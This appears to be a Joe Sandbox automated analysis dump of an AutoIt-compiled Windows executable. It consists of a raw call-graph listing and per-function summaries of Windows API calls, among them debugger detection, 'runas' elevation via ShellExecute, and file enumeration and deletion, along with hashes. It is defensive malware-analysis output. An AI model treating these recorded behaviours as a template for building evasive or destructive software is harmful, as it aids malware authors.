Mailbox 59 API calls 101226->101227 101227->101228 101228->101138 101230 ff1998 _memmove 101229->101230 101231 ff198f 101229->101231 101230->101215 101231->101230 101232 ff1aa4 59 API calls 101231->101232 101232->101230 101233->101224 101235 1000fe6 Mailbox 59 API calls 101234->101235 101236 ff1c88 101235->101236 101236->101224 101238 ff14ce 101237->101238 101239 ff1471 101237->101239 101241 ff1981 59 API calls 101238->101241 101239->101238 101240 ff147c 101239->101240 101243 ff1497 
101240->101243 101244 102f1de 101240->101244 101242 ff149f _memmove 101241->101242 101242->101167 101254 ff1b7c 59 API calls Mailbox 101243->101254 101246 ff1c7e 59 API calls 101244->101246 101247 102f1e8 101246->101247 101248 1000fe6 Mailbox 59 API calls 101247->101248 101249 102f208 101248->101249 101251 ff1aa4 59 API calls 101250->101251 101252 ff1614 101251->101252 101252->101163 101252->101177 101253->101189 101254->101242 101256 ff1692 101255->101256 101260 ff16ba _memmove 101255->101260 101257 1000fe6 Mailbox 59 API calls 101256->101257 101256->101260 101259 ff176f _memmove 101257->101259 101258 1000fe6 Mailbox 59 API calls 101258->101259 101259->101258 101260->101199 101261->101200 101263 ff18b4 __NMSG_WRITE 101262->101263 101264 ff1c7e 59 API calls 101263->101264 101265 ff18c5 _memmove 101263->101265 101266 102f4f1 _memmove 101264->101266 101265->101208 101268 1044131 101267->101268 101269 1044965 FindFirstFileW 101267->101269 101268->100652 101269->101268 101270 104497a FindClose 101269->101270 101270->101268 101272 fe503c 101271->101272 101273 fe5041 101271->101273 101272->101273 101333 10037ba 59 API calls 101272->101333 101273->100817 101276 ff133d 59 API calls 101275->101276 101277 1043f52 GetFileAttributesW 101276->101277 101278 1043f66 GetLastError 101277->101278 101281 1043f7f Mailbox 101277->101281 101279 1043f73 CreateDirectoryW 101278->101279 101280 1043f81 101278->101280 101279->101280 101279->101281 101280->101281 101282 ff1981 59 API calls 101280->101282 101281->100842 101283 1043fc3 101282->101283 101284 1043f1d 59 API calls 101283->101284 101285 1043fcc 101284->101285 101285->101281 101286 1043fd0 CreateDirectoryW 101285->101286 101286->101281 101288 ff1207 59 API calls 101287->101288 101289 1043cff 101288->101289 101290 ff1207 59 API calls 101289->101290 101291 1043d07 101290->101291 101292 ff1207 59 API calls 101291->101292 101293 1043d0f 101292->101293 101294 ff1207 59 API calls 101293->101294 101295 1043d17 101294->101295 101296 1000284 
60 API calls 101295->101296 101297 1043d21 101296->101297 101298 1000284 60 API calls 101297->101298 101299 1043d2b 101298->101299 101334 1044f82 101299->101334 101301 1043d36 101302 1044fec GetFileAttributesW 101301->101302 101303 1043d41 101302->101303 101304 1043d53 101303->101304 101305 ff1900 59 API calls 101303->101305 101306 1044fec GetFileAttributesW 101304->101306 101305->101304 101307 1043d5b 101306->101307 101308 1043d68 101307->101308 101309 ff1900 59 API calls 101307->101309 101310 ff1207 59 API calls 101308->101310 101309->101308 101311 1043d70 101310->101311 101312 ff1207 59 API calls 101311->101312 101313 1043d78 101312->101313 101314 1000119 59 API calls 101313->101314 101315 1043d89 FindFirstFileW 101314->101315 101316 1043eb4 FindClose 101315->101316 101325 1043dac Mailbox 101315->101325 101321 1043ebe Mailbox 101316->101321 101317 1043e88 FindNextFileW 101317->101325 101318 ff1a36 59 API calls 101318->101325 101320 ff1c9c 59 API calls 101320->101325 101321->100841 101322 ff17e0 59 API calls 101322->101325 101323 ff1900 59 API calls 101323->101325 101324 104412a 3 API calls 101324->101325 101325->101316 101325->101317 101325->101318 101325->101320 101325->101322 101325->101323 101325->101324 101326 1043e2a 101325->101326 101327 1043eab FindClose 101325->101327 101329 1043ef7 CopyFileExW 101325->101329 101332 1043e6b DeleteFileW 101325->101332 101345 1044561 101325->101345 101330 1043e4e MoveFileW 101326->101330 101331 1043e3e DeleteFileW 101326->101331 101399 ff151f 101326->101399 101327->101321 101329->101325 101330->101325 101331->101325 101332->101325 101333->101273 101335 ff1207 59 API calls 101334->101335 101336 1044f97 101335->101336 101337 ff1207 59 API calls 101336->101337 101338 1044f9f 101337->101338 101339 1000119 59 API calls 101338->101339 101340 1044fae 101339->101340 101341 1000119 59 API calls 101340->101341 101342 1044fbe 101341->101342 101343 ff151f 61 API calls 101342->101343 101344 1044fce Mailbox 101343->101344 101344->101301 
101346 104457d 101345->101346 101347 1044590 101346->101347 101348 1044582 101346->101348 101349 ff1207 59 API calls 101347->101349 101350 ff1c9c 59 API calls 101348->101350 101351 1044598 101349->101351 101398 104458b Mailbox 101350->101398 101352 ff1207 59 API calls 101351->101352 101353 10445a0 101352->101353 101354 ff1207 59 API calls 101353->101354 101355 10445ab 101354->101355 101356 ff1207 59 API calls 101355->101356 101357 10445b3 101356->101357 101358 ff1207 59 API calls 101357->101358 101359 10445bb 101358->101359 101360 ff1207 59 API calls 101359->101360 101361 10445c3 101360->101361 101362 ff1207 59 API calls 101361->101362 101363 10445cb 101362->101363 101364 ff1207 59 API calls 101363->101364 101365 10445d3 101364->101365 101366 1000119 59 API calls 101365->101366 101367 10445ea 101366->101367 101368 1000119 59 API calls 101367->101368 101369 1044603 101368->101369 101370 ff1609 59 API calls 101369->101370 101371 104460f 101370->101371 101372 1044622 101371->101372 101373 ff1981 59 API calls 101371->101373 101374 ff1609 59 API calls 101372->101374 101373->101372 101375 104462b 101374->101375 101376 104463b 101375->101376 101377 ff1981 59 API calls 101375->101377 101378 ff1c9c 59 API calls 101376->101378 101377->101376 101379 1044647 101378->101379 101380 ff17e0 59 API calls 101379->101380 101381 1044653 101380->101381 101402 1044713 59 API calls 101381->101402 101383 1044662 101403 1044713 59 API calls 101383->101403 101385 1044675 101386 ff1609 59 API calls 101385->101386 101387 104467f 101386->101387 101388 1044684 101387->101388 101389 1044696 101387->101389 101390 ff1900 59 API calls 101388->101390 101391 ff1609 59 API calls 101389->101391 101393 1044691 101390->101393 101392 104469f 101391->101392 101394 10446bd 101392->101394 101395 ff1900 59 API calls 101392->101395 101396 ff17e0 59 API calls 101393->101396 101397 ff17e0 59 API calls 101394->101397 101395->101393 101396->101394 101397->101398 101398->101325 101404 ff14db 101399->101404 
101402->101383 101403->101385 101405 ff14e9 CompareStringW 101404->101405 101410 102f210 101404->101410 101408 ff150c 101405->101408 101407 102f25f 101408->101326 101409 1004eb8 60 API calls 101409->101410 101410->101407 101410->101409 101412 104f8f2 101411->101412 101413 104f898 101411->101413 101487 104fbb7 59 API calls 101412->101487 101414 1000fe6 Mailbox 59 API calls 101413->101414 101416 104f89f 101414->101416 101420 104f8ab 101416->101420 101474 ff3df7 60 API calls Mailbox 101416->101474 101417 104f8ff 101419 104f8d9 101417->101419 101422 104f9cb 101417->101422 101428 104f93f 101417->101428 101419->100849 101421 fe4d37 84 API calls 101420->101421 101424 104f8bd 101421->101424 101467 1048cd0 101422->101467 101475 ff3e47 101424->101475 101425 104f9d2 101471 104394d 101425->101471 101430 fe4d37 84 API calls 101428->101430 101429 104f8cd 101429->101419 101486 ff3f0b CloseHandle 101429->101486 101436 104f946 101430->101436 101433 104f9c1 101448 104399c 101433->101448 101434 104f97a 101488 ff162d 101434->101488 101436->101433 101436->101434 101438 ff42cf CloseHandle 101440 104fa20 101438->101440 101440->101419 101493 ff3f0b CloseHandle 101440->101493 101441 ff1c9c 59 API calls 101442 104f994 101441->101442 101443 ff1900 59 API calls 101442->101443 101445 104f9a2 101443->101445 101446 104399c 66 API calls 101445->101446 101447 104f9ae Mailbox 101446->101447 101447->101419 101447->101438 101449 1043a15 101448->101449 101450 10439af 101448->101450 101452 104394d 3 API calls 101449->101452 101450->101449 101451 10439b4 101450->101451 101453 1043a09 101451->101453 101454 10439be 101451->101454 101466 10439fd Mailbox 101452->101466 101511 1043a35 62 API calls Mailbox 101453->101511 101456 10439de 101454->101456 101457 10439c8 101454->101457 101458 ff40cd 59 API calls 101456->101458 101497 ff40cd 101457->101497 101460 10439e6 101458->101460 101510 10438e0 61 API calls Mailbox 101460->101510 101463 10439dc 101494 104397e 101463->101494 101466->101447 101468 1048cde 
101467->101468 101469 1048cd9 101467->101469 101468->101425 101514 1047d6e 61 API calls 2 library calls 101469->101514 101515 104384c 101471->101515 101473 1043959 WriteFile 101473->101447 101474->101420 101476 ff42cf CloseHandle 101475->101476 101477 ff3e53 101476->101477 101524 ff42f9 101477->101524 101479 ff3e72 101485 ff3e95 101479->101485 101532 ff3c61 62 API calls Mailbox 101479->101532 101481 ff3e84 101533 ff389f 101481->101533 101484 104394d 3 API calls 101484->101485 101485->101417 101485->101429 101486->101419 101487->101417 101489 1000fe6 Mailbox 59 API calls 101488->101489 101490 ff1652 101489->101490 101491 1000fe6 Mailbox 59 API calls 101490->101491 101492 ff1660 101491->101492 101492->101441 101493->101419 101495 104394d 3 API calls 101494->101495 101496 1043990 101495->101496 101496->101466 101498 1000fe6 Mailbox 59 API calls 101497->101498 101499 ff40e0 101498->101499 101500 ff1c7e 59 API calls 101499->101500 101501 ff40ed 101500->101501 101502 ff402a WideCharToMultiByte 101501->101502 101503 ff404e 101502->101503 101504 ff4085 101502->101504 101506 1000fe6 Mailbox 59 API calls 101503->101506 101513 ff3f20 59 API calls Mailbox 101504->101513 101507 ff4055 WideCharToMultiByte 101506->101507 101512 ff3f79 59 API calls 2 library calls 101507->101512 101509 ff4077 101509->101463 101510->101463 101511->101466 101512->101509 101513->101509 101514->101468 101516 1043853 101515->101516 101517 104385e 101515->101517 101522 ff42ae SetFilePointerEx 101516->101522 101517->101473 101519 10438b8 SetFilePointerEx 101523 ff42ae SetFilePointerEx 101519->101523 101521 10438d7 101521->101473 101522->101519 101523->101521 101525 ff4312 CreateFileW 101524->101525 101526 10306fc 101524->101526 101527 ff4334 101525->101527 101526->101527 101528 1030702 CreateFileW 101526->101528 101527->101479 101528->101527 101529 1030728 101528->101529 101537 ff410a 101529->101537 101532->101481 101534 ff38a8 101533->101534 101535 ff38b5 101533->101535 101536 ff410a 2 API calls 
101534->101536 101535->101484 101535->101485 101536->101535 101544 ff4124 101537->101544 101538 ff41ab SetFilePointerEx 101545 ff42ae SetFilePointerEx 101538->101545 101539 10306cc 101546 ff42ae SetFilePointerEx 101539->101546 101542 ff417f 101542->101527 101543 10306e6 101544->101538 101544->101539 101544->101542 101545->101542 101546->101543 101548 fe4d37 84 API calls 101547->101548 101549 105d203 101548->101549 101554 105d24a Mailbox 101549->101554 101585 105de8e 101549->101585 101551 105d617 101636 105dfb1 92 API calls Mailbox 101551->101636 101554->100861 101555 105d626 101556 105d4b0 101555->101556 101558 105d632 101555->101558 101598 105d057 101556->101598 101557 fe4d37 84 API calls 101563 105d29b Mailbox 101557->101563 101558->101554 101563->101554 101563->101557 101572 105d4a2 101563->101572 101618 104fc0d 59 API calls 2 library calls 101563->101618 101619 105d6c8 61 API calls 2 library calls 101563->101619 101564 105d4e9 101613 1000e38 101564->101613 101567 105d503 101620 104a48d 89 API calls 4 library calls 101567->101620 101568 105d51c 101621 fe47be 101568->101621 101571 105d50e GetCurrentProcess TerminateProcess 101571->101568 101572->101551 101572->101556 101577 105d68d 101577->101554 101581 105d6a1 FreeLibrary 101577->101581 101578 105d554 101633 105dd32 107 API calls _free 101578->101633 101581->101554 101583 105d565 101583->101577 101634 fe4230 59 API calls Mailbox 101583->101634 101635 fe523c 59 API calls 101583->101635 101637 105dd32 107 API calls _free 101583->101637 101586 ff1aa4 59 API calls 101585->101586 101587 105dea9 CharLowerBuffW 101586->101587 101638 103f903 101587->101638 101591 ff1207 59 API calls 101592 105dee2 101591->101592 101593 ff1462 59 API calls 101592->101593 101594 105def9 101593->101594 101595 ff1981 59 API calls 101594->101595 101596 105df05 Mailbox 101595->101596 101597 105df41 Mailbox 101596->101597 101645 105d6c8 61 API calls 2 library calls 101596->101645 101597->101563 101599 105d0c7 101598->101599 101600 105d072 
101598->101600 101604 105e139 101599->101604 101601 1000fe6 Mailbox 59 API calls 101600->101601 101603 105d094 101601->101603 101602 1000fe6 Mailbox 59 API calls 101602->101603 101603->101599 101603->101602 101605 105e362 Mailbox 101604->101605 101612 105e15c _strcat _wcscpy __NMSG_WRITE 101604->101612 101605->101564 101606 fe5087 59 API calls 101606->101612 101607 fe502b 59 API calls 101607->101612 101608 fe50d5 59 API calls 101608->101612 101609 fe4d37 84 API calls 101609->101612 101610 100593c 58 API calls _W_store_winword 101610->101612 101612->101605 101612->101606 101612->101607 101612->101608 101612->101609 101612->101610 101646 1045e42 61 API calls 2 library calls 101612->101646 101616 1000e4d 101613->101616 101614 1000ee5 CreateToolhelp32Snapshot 101615 1000eb3 101614->101615 101615->101567 101615->101568 101616->101614 101616->101615 101617 1000ed3 CloseHandle 101616->101617 101617->101615 101618->101563 101619->101563 101620->101571 101622 fe47c6 101621->101622 101623 1000fe6 Mailbox 59 API calls 101622->101623 101624 fe47d4 101623->101624 101625 fe47e0 101624->101625 101647 fe46ec 59 API calls Mailbox 101624->101647 101627 fe4540 101625->101627 101648 fe4650 101627->101648 101629 fe454f 101630 1000fe6 Mailbox 59 API calls 101629->101630 101631 fe45eb 101629->101631 101630->101631 101631->101583 101632 fe4230 59 API calls Mailbox 101631->101632 101632->101578 101633->101583 101634->101583 101635->101583 101636->101555 101637->101583 101640 103f92e __NMSG_WRITE 101638->101640 101639 103f96d 101639->101591 101639->101596 101640->101639 101641 103fa14 101640->101641 101642 103f963 101640->101642 101641->101639 101644 ff14db 61 API calls 101641->101644 101642->101639 101643 ff14db 61 API calls 101642->101643 101643->101642 101644->101641 101645->101597 101646->101612 101647->101625 101649 fe4659 Mailbox 101648->101649 101650 101d6ec 101649->101650 101655 fe4663 101649->101655 101651 1000fe6 Mailbox 59 API calls 101650->101651 101653 101d6f8 101651->101653 
101652 fe466a 101652->101629 101655->101652 101656 fe5190 59 API calls Mailbox 101655->101656 101656->101655 101657->100885 101658->100882 101660 105a970 101659->101660 101661 105a918 101659->101661 101660->100914 101662 1000fe6 Mailbox 59 API calls 101661->101662 101665 105a93a 101662->101665 101663 1000fe6 Mailbox 59 API calls 101663->101665 101665->101660 101665->101663 101691 103715b 59 API calls Mailbox 101665->101691 101667 10478ac 101666->101667 101669 10478e3 101666->101669 101668 1000fe6 Mailbox 59 API calls 101667->101668 101667->101669 101668->101669 101670 1036ebc 101669->101670 101671 1036f06 101670->101671 101676 1036f1c Mailbox 101670->101676 101674 ff1a36 59 API calls 101671->101674 101672 1036f47 101675 105c355 301 API calls 101672->101675 101673 1036f5a 101677 fea820 301 API calls 101673->101677 101674->101676 101682 1036f53 101675->101682 101676->101672 101676->101673 101680 1036f91 101677->101680 101679 1037002 101679->100941 101681 1036fdc 101680->101681 101680->101682 101684 1036fc1 101680->101684 101681->101682 101698 104a48d 89 API calls 4 library calls 101681->101698 101699 1036cf1 59 API calls Mailbox 101682->101699 101692 103706d 101684->101692 101686->100941 101687->100923 101688->100929 101689->100942 101690->100946 101691->101665 101693 1037085 101692->101693 101700 105495b 101693->101700 101709 105f1b2 101693->101709 101714 feec83 101693->101714 101694 10370d9 101694->101682 101698->101682 101699->101679 101701 1000fe6 Mailbox 59 API calls 101700->101701 101702 105496c 101701->101702 101789 ff433f 101702->101789 101705 fe4d37 84 API calls 101706 105498d GetEnvironmentVariableW 101705->101706 101792 1047a51 59 API calls Mailbox 101706->101792 101708 10549aa 101708->101694 101710 fe4d37 84 API calls 101709->101710 101711 105f1cf 101710->101711 101712 1044148 66 API calls 101711->101712 101713 105f1de 101712->101713 101713->101694 101715 fe4d37 84 API calls 101714->101715 101716 feeca2 101715->101716 101717 fe4d37 84 API calls 
101716->101717 101718 feecb7 101717->101718 101719 fe4d37 84 API calls 101718->101719 101720 feecca 101719->101720 101721 fe4d37 84 API calls 101720->101721 101722 feece0 101721->101722 101723 ff162d 59 API calls 101722->101723 101724 feecf4 101723->101724 101725 feed19 101724->101725 101727 fe502b 59 API calls 101724->101727 101726 1025b67 101725->101726 101755 feed43 __wopenfile 101725->101755 101728 fe47be 59 API calls 101726->101728 101727->101725 101730 1025b7a 101728->101730 101729 feef3e 101731 fe47be 59 API calls 101729->101731 101732 fe4540 59 API calls 101730->101732 101734 1025d4a 101731->101734 101735 1025b8c 101732->101735 101733 fe4d37 84 API calls 101736 feedca 101733->101736 101737 1025d53 101734->101737 101738 1025d97 101734->101738 101739 fe43d0 59 API calls 101735->101739 101766 1025bb1 101735->101766 101740 fe4d37 84 API calls 101736->101740 101743 fe4540 59 API calls 101737->101743 101741 fe4540 59 API calls 101738->101741 101739->101766 101744 feeddf 101740->101744 101745 1025da1 101741->101745 101742 feef0c Mailbox 101742->101694 101748 1025d5e 101743->101748 101744->101729 101751 fe47be 59 API calls 101744->101751 101749 fe43d0 59 API calls 101745->101749 101747 1025c0f 101747->101729 101757 fe4540 59 API calls 101747->101757 101750 fe4d37 84 API calls 101748->101750 101752 1025dbd 101749->101752 101754 1025d70 101750->101754 101756 feedfe 101751->101756 101764 fe4d37 84 API calls 101752->101764 101753 fe477a 59 API calls 101753->101766 101808 ff1364 59 API calls 2 library calls 101754->101808 101755->101729 101755->101733 101755->101747 101779 feee30 __wopenfile 101755->101779 101756->101747 101759 feee09 101756->101759 101761 1025c76 101757->101761 101763 fe4540 59 API calls 101759->101763 101760 fe43d0 59 API calls 101760->101766 101767 fe43d0 59 API calls 101761->101767 101762 1025d84 101768 fe477a 59 API calls 101762->101768 101770 feee18 101763->101770 101771 1025dd8 101764->101771 101766->101742 101766->101753 101766->101760 101806 
ff1364 59 API calls 2 library calls 101766->101806 101767->101779 101769 1025d92 101768->101769 101776 fe43d0 59 API calls 101769->101776 101772 ff19e1 59 API calls 101770->101772 101809 ff1364 59 API calls 2 library calls 101771->101809 101772->101779 101774 fe477a 59 API calls 101774->101779 101775 1025dec 101777 fe477a 59 API calls 101775->101777 101776->101742 101777->101769 101778 fe43d0 59 API calls 101778->101779 101779->101742 101779->101774 101779->101778 101780 1025cc2 101779->101780 101805 ff1364 59 API calls 2 library calls 101779->101805 101781 1025cfb 101780->101781 101782 1025cec 101780->101782 101793 fe477a 101781->101793 101807 ff153b 59 API calls 2 library calls 101782->101807 101787 1025d1c 101788 ff19e1 59 API calls 101787->101788 101788->101729 101790 1000fe6 Mailbox 59 API calls 101789->101790 101791 ff4351 101790->101791 101791->101705 101792->101708 101794 1000fe6 Mailbox 59 API calls 101793->101794 101795 fe4787 101794->101795 101796 fe43d0 101795->101796 101797 101d6c9 101796->101797 101799 fe43e7 101796->101799 101797->101799 101811 fe40cb 59 API calls Mailbox 101797->101811 101800 fe44e8 101799->101800 101801 fe4530 101799->101801 101804 fe44ef 101799->101804 101803 1000fe6 Mailbox 59 API calls 101800->101803 101810 fe523c 59 API calls 101801->101810 101803->101804 101804->101787 101805->101779 101806->101766 101807->101729 101808->101762 101809->101775 101810->101804 101811->101799 101813 1044cf0 101812->101813 101814 1044d09 101812->101814 101813->101814 101817 1044d0f 101813->101817 101818 100385c GetStringTypeW _iswctype 101813->101818 101819 10037c3 59 API calls __wcstoi64 101814->101819 101817->100958 101818->101813 101819->101817 101821 fe3b3f 101820->101821 101827 fe3b67 101820->101827 101822 fe3b4d 101821->101822 101823 fe3b31 59 API calls 101821->101823 101824 fe3b53 101822->101824 101825 fe3b31 59 API calls 101822->101825 101823->101822 101824->101827 101830 fe5190 59 API calls Mailbox 101824->101830 101825->101824 

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FF526C
                                                                        • IsDebuggerPresent.KERNEL32 ref: 00FF527E
                                                                        • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00FF52E6
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                          • Part of subcall function 00FEBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00FEBC07
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00FF5366
                                                                        • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 01030B2E
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 01030B66
                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,01096D10), ref: 01030BE9
                                                                        • ShellExecuteW.SHELL32(00000000), ref: 01030BF0
                                                                          • Part of subcall function 00FF514C: GetSysColorBrush.USER32(0000000F), ref: 00FF5156
                                                                          • Part of subcall function 00FF514C: LoadCursorW.USER32(00000000,00007F00), ref: 00FF5165
                                                                          • Part of subcall function 00FF514C: LoadIconW.USER32(00000063), ref: 00FF517C
                                                                          • Part of subcall function 00FF514C: LoadIconW.USER32(000000A4), ref: 00FF518E
                                                                          • Part of subcall function 00FF514C: LoadIconW.USER32(000000A2), ref: 00FF51A0
                                                                          • Part of subcall function 00FF514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00FF51C6
                                                                          • Part of subcall function 00FF514C: RegisterClassExW.USER32(?), ref: 00FF521C
                                                                          • Part of subcall function 00FF50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00FF5109
                                                                          • Part of subcall function 00FF50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00FF512A
                                                                          • Part of subcall function 00FF50DB: ShowWindow.USER32(00000000), ref: 00FF513E
                                                                          • Part of subcall function 00FF50DB: ShowWindow.USER32(00000000), ref: 00FF5147
                                                                          • Part of subcall function 00FF59D3: _memset.LIBCMT ref: 00FF59F9
                                                                          • Part of subcall function 00FF59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FF5A9E
                                                                        Strings
                                                                        • runas, xrefs: 01030BE4
                                                                        • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 01030B28
                                                                        • AutoIt, xrefs: 01030B23
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                        • API String ID: 529118366-2030392706
                                                                        • Opcode ID: ca8c02f40a9d85783b92dfa24319e7bb9c7a726ec3459499bcd896060b5021d5
                                                                        • Instruction ID: 2f11a676bed2f8d2a455396b5b1d91ae952fcc29f65c88f201ce24ae2c0d6197
                                                                        • Opcode Fuzzy Hash: ca8c02f40a9d85783b92dfa24319e7bb9c7a726ec3459499bcd896060b5021d5
                                                                        • Instruction Fuzzy Hash: 73513431E0064CEACF21ABF4DC01EFE7B79AF45740F408199F7D16216ACAAA4504E720

                                                                        Control-flow Graph

                                                                        APIs
                                                                          • Part of subcall function 01000284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF2A58,?,00008000), ref: 010002A4
                                                                          • Part of subcall function 01044FEC: GetFileAttributesW.KERNEL32(?,01043BFE), ref: 01044FED
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 01043D96
                                                                        • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 01043E3E
                                                                        • MoveFileW.KERNEL32(?,?), ref: 01043E51
                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 01043E6E
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 01043E90
                                                                        • FindClose.KERNEL32(00000000,?,?,?,?), ref: 01043EAC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                        • String ID: \*.*
                                                                        • API String ID: 4002782344-1173974218
                                                                        • Opcode ID: 6f8d258427c5a1340b334e653a597a6eca0d6fe08571d34a879355254993ed63
                                                                        • Instruction ID: 906ed1386fa1686dfc87f64ef79725517be8161ac3a46659097d9b86134fe2d2
                                                                        • Opcode Fuzzy Hash: 6f8d258427c5a1340b334e653a597a6eca0d6fe08571d34a879355254993ed63
                                                                        • Instruction Fuzzy Hash: 12516E7180111DABCB25EBA0DD929FDB7B9BF11300F2042A5E582B71A5EB356F09DB60

                                                                        Control-flow Graph

                                                                        [Control-flow graph for the function at ff5d13 (executed / not-executed colouring not reproduced); its basic blocks call GetVersionExW, GetCurrentProcess, IsWow64Process, GetNativeSystemInfo, FreeLibrary and GetSystemInfo]
                                                                        APIs
                                                                        • GetVersionExW.KERNEL32(?), ref: 00FF5D40
                                                                          • Part of subcall function 00FF1821: _memmove.LIBCMT ref: 00FF185B
                                                                        • GetCurrentProcess.KERNEL32(?,01070A18,00000000,00000000,?), ref: 00FF5E07
                                                                        • IsWow64Process.KERNEL32(00000000), ref: 00FF5E0E
                                                                        • GetNativeSystemInfo.KERNEL32(00000000), ref: 00FF5E54
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00FF5E5F
                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00FF5E90
                                                                        • GetSystemInfo.KERNEL32(00000000), ref: 00FF5E9C
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_28_2_fe0000_Carter.jbxd
                                                                        Similarity
                                                                        • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                        • String ID:
                                                                        • API String ID: 1986165174-0
                                                                        • Opcode ID: 5d53cba0a5f8f3dc6f2bd43776191edeb01df72735ed68be04c0adefa278b513
                                                                        • Instruction ID: dbf6a036c07aeda899fb20f17207b1b8ce04d22fd56b09743e197f366bd7fa2a
                                                                        • Opcode Fuzzy Hash: 5d53cba0a5f8f3dc6f2bd43776191edeb01df72735ed68be04c0adefa278b513
                                                                        • Instruction Fuzzy Hash: A991E63194ABC4DEC731CB7894501BAFFE56F2A300B884A9EE2C797B12D235A508D759

                                                                        Control-flow Graph

                                                                        [Control-flow graph for the function at 1044005 (executed / not-executed colouring not reproduced); its basic blocks call FindFirstFileW, DeleteFileW, FindNextFileW and FindClose]
                                                                        APIs
                                                                          • Part of subcall function 01000284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FF2A58,?,00008000), ref: 010002A4
                                                                          • Part of subcall function 01044FEC: GetFileAttributesW.KERNEL32(?,01043BFE), ref: 01044FED
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0104407C
                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 010440CC
                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 010440DD
                                                                        • FindClose.KERNEL32(00000000), ref: 010440F4
                                                                        • FindClose.KERNEL32(00000000), ref: 010440FD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000001C.00000002.4142180890.0000000000FE1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00FE0000, based on PE: true
                                                                        • Associated: 0000001C.00000002.4142130986.0000000000FE0000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001070000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142279187.0000000001096000.00000002.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142360256.00000000010A0000.00000004.00000001.01000000.0000000F.sdmp
                                                                        • Associated: 0000001C.00000002.4142924213.00000000010A9000.00000002.00000001.01000000.0000000F.sdmp
                                                                        Joe Sandbox IDA Plugin
